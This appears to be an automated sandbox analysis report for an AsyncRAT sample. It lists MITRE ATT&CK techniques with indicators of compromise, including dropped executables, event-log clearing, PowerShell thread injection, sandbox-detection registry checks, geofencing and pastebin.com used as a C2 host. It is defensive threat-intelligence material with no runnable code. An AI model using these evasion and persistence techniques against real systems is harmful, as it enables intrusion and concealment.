asyncrat | 15c8cc6c27eab9e8c6e8e01883247ffc4a3907042d747859fff2ce622f9647dc

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	LNjector (1).exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	acc449ba-d046-4b86-956f-10f8d1ac6d73.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe

Executes dropped EXE 5 IoCs

pid	Process
2180	03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe
1664	acc449ba-d046-4b86-956f-10f8d1ac6d73.exe
3684	$77non.exe
4008	$77oui.exe
3568	369e383a-9351-4c3d-ad14-5c551fd60479.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx	svchost.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4604	powershell.EXE

Legitimate hosting services abused for malware hosting/C2 1 TTPs 48 IoCs

Web Service

T1102

flow	ioc
48	pastebin.com
124	pastebin.com
132	pastebin.com
151	pastebin.com
155	pastebin.com
49	pastebin.com
56	pastebin.com
72	pastebin.com
73	pastebin.com
140	pastebin.com
47	pastebin.com
55	pastebin.com
152	pastebin.com
141	pastebin.com
144	pastebin.com
150	pastebin.com
28	pastebin.com
38	pastebin.com
46	pastebin.com
74	pastebin.com
125	pastebin.com
154	pastebin.com
147	pastebin.com
149	pastebin.com
156	pastebin.com
105	pastebin.com
129	pastebin.com
136	pastebin.com
145	pastebin.com
146	pastebin.com
153	pastebin.com
29	pastebin.com
130	pastebin.com
138	pastebin.com
143	pastebin.com
148	pastebin.com
39	pastebin.com
51	pastebin.com
66	pastebin.com
139	pastebin.com
142	pastebin.com
131	pastebin.com
137	pastebin.com
27	pastebin.com
50	pastebin.com
67	pastebin.com
71	pastebin.com
106	pastebin.com

Drops file in System32 directory 13 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File created	C:\Windows\SysWOW64\$77non.exe	acc449ba-d046-4b86-956f-10f8d1ac6d73.exe
File created	C:\Windows\SysWOW64\$77oui.exe	03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4604 set thread context of 864	4604	powershell.EXE	125

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	$77oui.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	369e383a-9351-4c3d-ad14-5c551fd60479.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	$77non.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	acc449ba-d046-4b86-956f-10f8d1ac6d73.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe

Checks SCSI registry key(s) 3 TTPs 18 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	wmiprvse.exe

Delays execution with timeout.exe 2 IoCs

defense_evasion

pid	Process
3688	timeout.exe
5108	timeout.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies Internet Explorer settings 1 TTPs 6 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Internet Explorer\Toolbar	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1"	Explorer.EXE

Modifies data under HKEY_USERS 55 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={46D1E072-05E8-424B-81E4-41BBD7F0FDBC}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Thu, 23 Jan 2025 13:41:16 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1737639675"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE

Modifies registry class 64 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = 00000000ffffffff	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Mode = "4"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\IconSize = "16"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Version = "1"	LNjector (1).exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000	LNjector (1).exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg	LNjector (1).exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg	LNjector (1).exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1"	sihost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\FFlags = "1"	LNjector (1).exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\IconSize = "16"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByKey:PID = "0"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}	LNjector (1).exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0\0	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Rev = "0"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0 = 7a003200cb063f00375a2a6d2000434f444543417e312e5a495000005e0009000400efbe375a2a6d375a2b6d2e00000000000000000000000000000000000000000000000000698e3f0063006f006400650063006100760065002d0068006f006f006b002d006d00610069006e002e007a006900700000001c000000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\FFlags = "18874369"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	LNjector (1).exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	LNjector (1).exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	LNjector (1).exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16"	LNjector (1).exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	LNjector (1).exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616193"	LNjector (1).exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3	LNjector (1).exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	LNjector (1).exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings	LNjector (1).exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4"	LNjector (1).exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0\NodeSlot = "6"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616193"	LNjector (1).exe
